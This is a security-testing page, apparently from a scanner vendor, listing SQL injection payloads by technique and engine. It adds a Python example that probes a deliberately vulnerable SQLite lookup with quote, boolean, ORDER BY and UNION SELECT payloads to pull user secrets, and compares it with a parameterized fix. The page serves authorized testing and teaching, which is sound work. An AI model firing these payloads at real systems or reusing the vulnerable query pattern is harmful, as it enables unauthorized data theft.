SQL Injection Payload List
SQL injection payload examples for authorized security testing. This page lists common payload types and test strings. Use only on systems you own or have permission to test. For detection methodology, see our SQL injection detection guide.
SQL Injection Payload Overview
SQL injection payloads are test strings used to detect and characterize SQLi vulnerabilities. They include boolean-based, error-based, time-based, and union-based variants. Each type serves a purpose: boolean-based confirms injectability through true/false logic, error-based triggers database errors that reveal structure, time-based infers vulnerability from response delay, and union-based extracts data through UNION SELECT.
Payload syntax varies by database (MySQL, PostgreSQL, SQL Server, Oracle). Comment syntax differs: MySQL accepts -- (which must be followed by a space or other whitespace) and #; PostgreSQL, SQL Server, and Oracle accept --; all four accept /* */. String concatenation also varies (|| in PostgreSQL and Oracle, + in SQL Server, CONCAT() in MySQL), as does quote escaping. Start with generic payloads that work across databases; refine based on error messages or behavior, since the wording of a database error usually identifies the engine. For full detection methodology, see our SQL injection detection guide.
Use Responsibly
- Authorization: Only test systems you own or have written permission to test
- Non-destructive: Use payloads that do not modify or delete data
- Evidence: Document findings for remediation, not exploitation
Payload Types and Use Cases
Boolean-based payloads change query logic to return different results for true vs false. If the page content or behavior changes when you inject a true condition (AND 1=1) vs a false one (AND 1=2) while an unmodified baseline request matches the true case, the parameter is likely vulnerable. Prefer the AND pair over OR 1=1: OR 1=1 makes the WHERE clause match every row, which is noisy in a SELECT and destructive if the same input reaches an UPDATE or DELETE. Error-based payloads use malformed input to trigger database errors; the error message often reveals database type, table names, or query structure, but only when the application displays errors. Time-based payloads use sleep or benchmark functions (SLEEP() in MySQL, pg_sleep() in PostgreSQL, WAITFOR DELAY in SQL Server); if the response is consistently delayed by the requested interval compared with the baseline, the input is being executed even when nothing is visible in the output.
Union-based payloads extend the original query with UNION SELECT to extract data. They require knowing the number of columns and compatible data types. Start with ORDER BY n, increasing n until the database errors, to determine the column count; then construct the UNION, using NULL as a placeholder for columns whose type you do not yet know, because NULL is compatible with every type. Never use payloads that DROP, DELETE, or UPDATE on systems you do not own.
Common Payload Examples
' OR '1'='1
' OR 1=1--
" OR "1"="1
1' AND '1'='1
"
`
--
#
/* */
These payloads help confirm vulnerability: the first four test whether the input changes the query's logic, and the last five test which quote and comment characters reach the SQL parser. Automated scanners like Vulnify's website vulnerability scanner use similar payloads in a controlled way. For comprehensive payload lists, refer to authoritative sources like OWASP; use them only in authorized testing.
Testing Workflow
Record a baseline response for each parameter first. Then send a single quote to trigger errors. If you see a database error, the input is likely reaching the query; if errors are suppressed, the absence of one proves nothing, so move on to boolean-based payloads and compare the true and false responses against the baseline to confirm injectability. Document the parameter, payload, and response. Run an automated scan for broader coverage; Vulnify's full website scanner tests multiple parameters and payload variants.
Testing Checklist
- Identify input points (forms, URL params, headers)
- Test with single quote and boolean payloads
- Document findings with evidence
- Run automated SQL injection test for coverage
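The following Python script is an added worked example, not code from this page or from Vulnify. It builds a constructed SQLite target with a deliberately vulnerable lookup beside its parameterized fix, then runs the workflow described under Payload Types and Testing Workflow against both: the single-quote error probe, the AND 1=1 / AND 1=2 boolean pair compared against a baseline, ORDER BY to count columns, and a UNION SELECT that uses the recovered column count. The table names, rows, and secret values are all made up for the demonstration. Time-based payloads are not shown because SQLite has no sleep function.

```python
import sqlite3


def build_target() -> sqlite3.Connection:
    """Constructed in-memory target standing in for the application under test."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, secret TEXT);
        INSERT INTO users VALUES (1, 'alice', 'hash-1'), (2, 'bob', 'hash-2');
    """)
    return conn


def vulnerable_lookup(conn, product_id: str):
    """Deliberately vulnerable: the parameter is spliced into the SQL text."""
    sql = f"SELECT name, price FROM products WHERE id = '{product_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, product_id: str):
    """Hardened form: a bound placeholder keeps the input as data, never as SQL."""
    sql = "SELECT name, price FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


def probe(lookup, conn, payload):
    """Send one payload; return ('ok', rows) or ('error', message) as evidence."""
    try:
        return ("ok", lookup(conn, payload))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def quote_test(lookup, conn, base="1"):
    """Error-based probe: a lone quote that breaks the statement if it reaches the parser."""
    status, _ = probe(lookup, conn, base + "'")
    return status == "error"


def boolean_test(lookup, conn, base="1"):
    """Boolean probe: the TRUE case must match the baseline and differ from the FALSE case."""
    baseline = probe(lookup, conn, base)
    true_case = probe(lookup, conn, base + "' AND '1'='1")
    false_case = probe(lookup, conn, base + "' AND '1'='2")
    return baseline == true_case and true_case != false_case


def column_count(lookup, conn, base="1", max_cols=10):
    """Raise ORDER BY n until the database rejects it; the last accepted n is the count."""
    for n in range(1, max_cols + 1):
        status, _ = probe(lookup, conn, f"{base}' ORDER BY {n}--")
        if status == "error":
            return n - 1
    return None  # never errored: the input is not reaching ORDER BY


def union_extract(lookup, conn, ncols, base="1"):
    """Pad the UNION with NULLs so it matches the original column count and types."""
    cols = ["username", "secret"] + ["NULL"] * (ncols - 2)
    payload = f"{base}' AND 1=0 UNION SELECT {', '.join(cols)} FROM users--"
    status, rows = probe(lookup, conn, payload)
    return rows if status == "ok" else []


def assess(lookup, conn, parameter="id"):
    """Run the page's workflow against one parameter and return the evidence record."""
    findings = {"parameter": parameter}
    findings["quote_error"] = quote_test(lookup, conn)
    findings["boolean_differential"] = boolean_test(lookup, conn)
    findings["injectable"] = findings["quote_error"] or findings["boolean_differential"]
    if findings["injectable"]:
        n = column_count(lookup, conn)
        findings["column_count"] = n
        findings["union_rows"] = union_extract(lookup, conn, n) if n else []
    return findings


if __name__ == "__main__":
    target = build_target()
    print("vulnerable:", assess(vulnerable_lookup, target))
    print("hardened:  ", assess(safe_lookup, target))
```

Against the vulnerable lookup the quote probe errors, the boolean pair diverges, ORDER BY 3 fails so the column count is 2, and the UNION returns both user rows. Against the parameterized lookup every probe returns the same empty or baseline result, so the record shows the parameter as not injectable. Keep the evidence dictionary with the request and response bodies when you report the finding.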
Frequently Asked Questions
Where can I learn to detect SQL injection?
See our SQL injection detection guide for step-by-step detection methods, error-based analysis, and prevention guidance.
Can I use these on any site?
No. Only on systems you own or have explicit permission to test. Unauthorized testing is illegal and can cause harm.
What tools automate SQLi testing?
Vulnify's website vulnerability scanner includes SQL injection tests. sqlmap and OWASP ZAP also automate SQLi detection for authorized use.